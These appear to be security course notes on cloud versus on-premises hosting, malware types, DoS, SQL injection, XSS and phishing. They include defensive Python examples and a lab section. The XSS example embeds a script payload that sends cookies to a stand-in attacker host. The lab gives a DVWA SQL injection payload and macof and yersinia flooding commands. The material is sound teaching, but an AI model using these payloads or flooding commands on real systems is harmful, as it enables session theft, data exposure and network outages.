Security Concepts

On-Premises:

  • On-premises solutions are hosted on hardware physically located at a site the organization controls, such as its own office or data center (DC).
  • The software is installed and run on servers the company owns, inside the company's own premises.
  • The IT staff has physical access to the servers and the data and directly controls their configuration.
  • The IT staff is also responsible for managing, patching, and securing the whole computing infrastructure and the data on it.


Cloud:

  • Cloud services run on servers that a hosting vendor, such as Microsoft Azure, owns and maintains, and are accessed over the Internet from any connected device.
  • The third-party provider is responsible for managing and securing the underlying infrastructure; the customer remains responsible for its own data, identities, and configuration.
  • Cloud computing is the alternative to on-premises software and technology.
  • Cloud is frequently chosen for its potential cost savings, lower power consumption, and reduced maintenance effort.
  • Security concerns are one of the biggest reasons organizations decide not to use cloud solutions.


Malware:

  • Malware is short for "Malicious Software": any file, code, or application designed to harm a computer or its user.
  • Malware is typically delivered over a network and, once present, infects the system, explores it, and steals or damages data.
  • Malware can be written to perform virtually any behavior an attacker wants.
  • Malware is an inclusive term for all types of malicious software: viruses, worms, Trojans, rootkits, spyware, adware, scareware, botnet agents, logic bombs, keyloggers, and so on.
  • Many tools can identify malware on the network, such as packet capture for traffic analysis, Snort, NetFlow, an IPS, Cisco Advanced Malware Protection (AMP), Cisco FirePOWER, and others.


Virus:

  • A virus is malicious code attached to an executable file, often a regular application.
  • Viruses require some human or application interaction (running the infected file) to activate.
  • Viruses are generally designed to spread to other files and to damage or destroy a system or its data.


Worm:

  • Worms are malware that replicate themselves and spread to infect other systems.
  • Think of a worm as a small program that copies itself across a computer network.
  • A worm can travel from system to system without human or application interaction, typically by exploiting a vulnerable network service.
  • When a worm executes on a new host, it replicates again and infects even more systems.
  • Worms can carry a destructive payload that corrupts or deletes files and data, including operating system (OS) files.
  • Even without a payload, worms harm the network by consuming bandwidth and system resources as they spread.


Adware:

  • Adware stands for Advertising-Supported Software; when installed without the user's consent it is treated as malware.
  • Adware generates revenue for its operator by showing advertisements.
  • Adware automatically plays, displays, or downloads advertisements on a user's computer.
  • The advertisements appear once the software has been installed or while the application is in use.


Ransomware:

  • Ransomware is designed to encrypt the files on the victim's system; some families also propagate like a worm.
  • Ransomware can encrypt specific files, all the files on the system, or the master boot record (MBR) so the machine no longer boots.
  • Ransomware then demands a payment in exchange for the decryption key.
  • Major ransomware families include Reveton, CryptoLocker, CryptoWall, Petya, NotPetya, and Bad Rabbit.
  • The 2017 WannaCry attack spread as a worm and rendered many PCs unusable worldwide, causing huge destruction.


Trojan:

  • Trojans are malicious programs that appear to be regular applications, media files, or other harmless computer files.
  • Trojans pretend to do one thing but, when loaded, actually perform another, malicious action.
  • Trojans contain a malicious payload; the payload can be any malicious act, and very often it provides a backdoor that gives the attacker unauthorized access to the system.
  • Trojan categories include command-shell Trojans, graphical user interface (GUI) Trojans, HTTP/HTTPS Trojans, document Trojans, defacement Trojans, botnet Trojans, VNC Trojans, remote-access Trojans, data-hiding Trojans, banking Trojans, DoS Trojans, FTP Trojans, software-disabling Trojans, and covert-channel Trojans.
  • Remote-access Trojans (RATs) give the attacker full remote control over the system.
  • Data-hiding Trojans encrypt or hide the user's data; when used to extort payment they are known as ransomware.
  • Security-software disablers are designed to attack and kill antivirus or firewall software.
  • Denial of Service (DoS) Trojans are designed to cause a DoS; they can knock out specific services or bring an entire system offline.
  • Trojans are dangerous because they represent a loss of confidentiality, integrity, and availability.
  • Credit card data and banking information are the most common targets of Trojans; passwords are the second most common target.
  • Trojans spread through P2P networks and file-sharing sites such as The Pirate Bay, which are generally unmonitored and allow anyone to distribute programs, legitimate or not.
  • Other delivery channels are instant messaging, Internet Relay Chat (IRC), e-mail attachments, browser extensions, and so on.


Spyware:

  • Spyware is a common type of malware.
  • Spyware monitors the activities a user performs on the PC.
  • The main intention of spyware is to collect the user's private information.
  • Spyware normally arrives from the Internet bundled with freeware the user downloads.
  • Spyware is similar to Trojan horse malware in that it hides inside something the user chose to install.


Rootkits:

  • A rootkit is a collection of software designed to hide the presence of malware and preserve privileged access on a system, computer, or network.
  • Rootkits work in the background so that a user does not notice anything suspicious.
  • By hiding processes, files, and network connections, rootkits allow several other types of malware to operate on the system undetected.
  • The term rootkit combines two words: "root" and "kit".
  • Root refers to the administrator account on Unix and Linux operating systems.
  • Kit refers to the set of programs that let threat actors obtain and keep unauthorized root/admin access.

Keyloggers:

  • A keylogger (keystroke logger) is software or hardware that records everything typed on a keyboard.
  • Keyloggers store the gathered keystrokes and send them to the attacker.
  • Attackers extract sensitive information such as passwords or credit card details from the captured keystrokes.


Scareware:

  • Scareware is a type of malware designed to trick victims into purchasing and installing useless or potentially dangerous software.
  • Scareware generates pop-ups that resemble Windows system messages.
  • Scareware usually purports to be antivirus or antispyware software, a firewall application, or a registry cleaner.
  • The messages typically claim that a large number of problems, such as infected files, were found on the computer.
  • The user is then prompted to purchase software to fix the problems.
  • In reality, no problems were detected, and the suggested software itself contains malware.


Logic Bomb:

  • A logic bomb is malware that is triggered in response to an event, such as launching an application or reaching a specific date and time.
  • Attackers use logic bombs in a variety of ways to destroy data or systems.
  • The bomb is embedded as arbitrary code within a fake application or Trojan horse and executes whenever the fraudulent software is launched.
  • Attackers can also combine spyware and logic bombs to steal identities.


Botnet:

  • The word botnet combines two words: "bot", short for robot, and "net", from network.
  • People who write and operate malware cannot manually log on to every computer they have infected, so they use botnets to manage a large number of systems at once.
  • A botnet is a network of infected computers (bots or zombies) that the operator controls remotely and can use to spread more malware.
  • Cybercriminals use Trojans to breach the security of many users' PCs, take control of each computer, and organize all the infected machines into the botnet.
  • The criminals then remotely manage and direct all the infected bots from a command-and-control server.


DoS (Denial of Service) Attack:

  • A DoS attack floods a network server with a large number of service requests.
  • The flood can crash the server or exhaust its resources, so legitimate users are denied the service.
  • DDoS stands for Distributed Denial of Service, a type of DoS attack that originates from many attacking computers in different geographical regions.
  • Zombies and botnets are the main source of DDoS traffic.
  • Both DoS and DDoS attacks cause services to become unavailable to users.
  • Examples are Ping of Death, Smurf attack, TCP SYN flood, CDP flood, buffer overflow, and ICMP flood.
  • Cloud environments are shared by many users and organizations, so a DoS attack against one tenant can degrade service for the others on the same infrastructure.
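The TCP SYN flood listed above leaves the server holding half-open connections: a SYN arrives, the server answers SYN-ACK, and the final ACK never comes. The following is an added example, not code from the original article, that runs that detection logic over a constructed set of flow records (the records, IP addresses, and the threshold of 50 are assumptions for the demo):

```python
from collections import Counter


def build_sample_records():
    """Constructed TCP flow records (assumption, not a real capture):
    (src_ip, dst_ip, dst_port, flags). "S" is the client SYN, "SA" the server's
    SYN-ACK, "A" the client ACK that completes the three-way handshake."""
    records = []
    # Legitimate client: three complete handshakes to the web server.
    for _ in range(3):
        records.append(("10.0.0.5", "10.0.0.80", 80, "S"))
        records.append(("10.0.0.80", "10.0.0.5", 80, "SA"))
        records.append(("10.0.0.5", "10.0.0.80", 80, "A"))
    # Attacker: 200 SYNs that are never followed by an ACK, each one a half-open connection.
    for _ in range(200):
        records.append(("203.0.113.9", "10.0.0.80", 80, "S"))
        records.append(("10.0.0.80", "203.0.113.9", 80, "SA"))
    return records


def half_open_by_source(records):
    """Count, per client address, the SYNs that were never completed with an ACK."""
    syns, acks = Counter(), Counter()
    for src, _dst, _port, flags in records:
        if flags == "S":
            syns[src] += 1
        elif flags == "A":
            acks[src] += 1
    return {src: syns[src] - acks[src] for src in syns}


def flag_syn_flood(records, threshold=50):
    """Sources with at least `threshold` half-open connections in the record window."""
    return sorted(src for src, n in half_open_by_source(records).items() if n >= threshold)


if __name__ == "__main__":
    recs = build_sample_records()
    print("half-open per source:", half_open_by_source(recs))
    print("flood sources       :", flag_syn_flood(recs))   # ['203.0.113.9']
```

The same counting works on real NetFlow or packet-capture output once the flags are parsed. On a Linux server the usual mitigation for the attack itself is SYN cookies (net.ipv4.tcp_syncookies = 1), which stop half-open entries from filling the listen backlog.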


SQL Injection:

  • SQL injection (SQLi) is a code injection technique that can expose or destroy your database.
  • SQL injection is one of the most common web hacking techniques used to gain access to data.
  • SQL injection places malicious SQL in a query by supplying crafted input through a web page field, which the application concatenates into its SQL statements.
  • A successful injection executes attacker-controlled SQL statements on the database server.
  • Attackers use SQL injection vulnerabilities to bypass application security measures such as login checks.
  • SQL injection is also used to read, add, modify, and delete records in the database.
  • SQL injection exploits vulnerable web applications, including cloud-based ones, to pass SQL commands through to the database.
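To show why the DVWA payload from lab step 4 (%' or '0'='0) returns every record, here is an added example that is not code from the original article: the string-built query beside its parameterized fix, run against a constructed in-memory SQLite table. The table, its rows, and the column names are assumptions in the shape of DVWA's users table, not the lab's real database.

```python
import sqlite3

# Constructed sample rows (assumption, not the lab's real data).
USERS = [
    (1, "admin", "Admin"),
    (2, "gordonb", "Brown"),
    (3, "1337", "Me"),
    (4, "pablo", "Picasso"),
    (5, "smithy", "Smith"),
]

# The exact input typed into the User ID field in lab step 4.
LAB_PAYLOAD = "%' or '0'='0"


def make_db():
    """Build an in-memory SQLite database so the example runs offline."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id INTEGER, user TEXT, last_name TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", USERS)
    return conn


def build_query(user_id):
    """String concatenation, the DVWA 'low' pattern: the input becomes part of the SQL text."""
    return "SELECT user, last_name FROM users WHERE user_id = '" + user_id + "'"


def lookup_vulnerable(conn, user_id):
    # With the lab payload the WHERE clause becomes   user_id = '%' or '0'='0'
    # and '0'='0' is always true, so every row comes back.
    return conn.execute(build_query(user_id)).fetchall()


def lookup_safe(conn, user_id):
    """Parameterised query: the driver binds user_id as a value, never as SQL text,
    so the quotes and the OR in the payload are just characters to match."""
    return conn.execute(
        "SELECT user, last_name FROM users WHERE user_id = ?", (user_id,)
    ).fetchall()


if __name__ == "__main__":
    conn = make_db()
    print("query sent   :", build_query(LAB_PAYLOAD))
    print("vulnerable   :", lookup_vulnerable(conn, LAB_PAYLOAD))   # all five rows
    print("parameterised:", lookup_safe(conn, LAB_PAYLOAD))         # []
```

The fix is the bound parameter, not input filtering: the same `?` placeholder protects against every quoting trick, whereas a blacklist of characters has to anticipate each one.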


Cross-Site Scripting:

  • XSS stands for Cross-Site Scripting, a type of coding error in which user-supplied input is written into a web page without being encoded.
  • Cross-site scripting is a security vulnerability found in web applications.
  • XSS enables attackers to inject client-side scripts into web pages viewed by other users, so the script runs in the victim's browser with the victim's session.
  • The common purpose of an XSS attack is to collect cookie data such as session IDs or login information.
  • Stolen session cookies can then be used to access a web or cloud-based application as the authenticated user.
  • The three major categories are Reflected XSS, Stored (Persistent) XSS, and DOM-Based XSS.
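The cookie-theft case described above, as an added example that is not code from the original article: a server-side page builder that reflects a request parameter raw, the same builder with output encoding, and the cookie flag that blunts the theft even when a script does run. The payload string, the attacker host, and the cookie name are assumptions for the demo.

```python
import html

# Constructed attacker input (assumption): a reflected-XSS payload that ships the
# victim's cookies to a host the attacker controls.
XSS_PAYLOAD = "<script>new Image().src='http://attacker.example/c?'+document.cookie</script>"


def render_vulnerable(name):
    """Reflected XSS: the request parameter is pasted straight into the HTML response,
    so the browser parses the payload as markup and runs the script."""
    return "<p>Hello, " + name + "</p>"


def render_safe(name):
    """Output encoding: the characters < > & and both quote types become entities,
    so the browser shows the payload as text instead of executing it."""
    return "<p>Hello, " + html.escape(name, quote=True) + "</p>"


def session_cookie_header(session_id):
    """Defence in depth: HttpOnly stops document.cookie from exposing the session ID
    even if a script does run; Secure and SameSite limit where the cookie is sent."""
    return "Set-Cookie: PHPSESSID=" + session_id + "; HttpOnly; Secure; SameSite=Lax"


def has_raw_script_tag(page):
    """Crude check used only to show the difference between the two renderers."""
    return "<script" in page.lower()


if __name__ == "__main__":
    print(render_vulnerable(XSS_PAYLOAD))   # script tag intact
    print(render_safe(XSS_PAYLOAD))         # &lt;script&gt;... rendered as text
    print(session_cookie_header("constructed-session-id"))
```

Encoding must match the context the value lands in: html.escape is right for text and attribute values, but a value dropped inside a script block or a URL needs that context's own encoding.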


Phishing:

  • Phishing is a type of social engineering attack used to steal user data such as login credentials and credit card numbers.
  • Phishing gathers personal information through deceptive e-mails and look-alike websites.
  • The attacker uses a disguised e-mail as the weapon, luring the victim into entering data on a site the attacker controls.


Man in The Middle:

  • MITM (Man in The Middle) means an attacker sitting in the middle of your conversation.
  • In a Man-in-the-Middle attack, attackers place themselves between two devices (for example, a user and an application) to intercept or modify the communications between them.
  • MITM attacks allow attackers to secretly read and alter traffic that both parties believe is private.
  • Attackers have many reasons and methods for using an MITM attack; it is commonly used to steal credit card numbers or user login credentials.


Data Breach:

  • A data breach exposes data that was not supposed to be released to the public.
  • This includes financial information, personal health information, trade secrets, personally identifiable information (PII), and other intellectual property.
  • The value of an organization's cloud-based data differs from one party to another.
  • Data breaches happen when the organization fails to manage authentication and identity properly.
  • Businesses need to allocate access to data according to each user's job role, so that nobody holds more access than the role needs.
  • One-time passwords and phone-based authentication are forms of two-factor authentication.
  • Two-factor authentication helps secure cloud services by making it much harder for an attacker who has stolen a password to use it.

Lab Time:

1- Go to https://geekprank.com/ to demonstrate what a virus infection and a ransomware lock screen look like.

2- Go to https://www.eicar.org/?page_id=3950 and download the EICAR test file, a harmless file that every antivirus should detect, to test the antivirus software.

3- On Windows XP, use the free Blackbox tool to show the keystroke records a keylogger captures.

4- On Windows XP, start the XAMPP Control Panel, open 192.168.122.60/dvwa (username admin, password password), go to DVWA Security, set it to low, and submit. Click SQL Injection, enter %' or '0'='0 in User ID, and click Submit; the page shows all the records.

5- DoS attack: start Kali Linux, add a switch in GNS3 and connect it to Kali Linux, then run macof -i eth0 for a MAC flooding attack and yersinia -G for a CDP flooding attack.
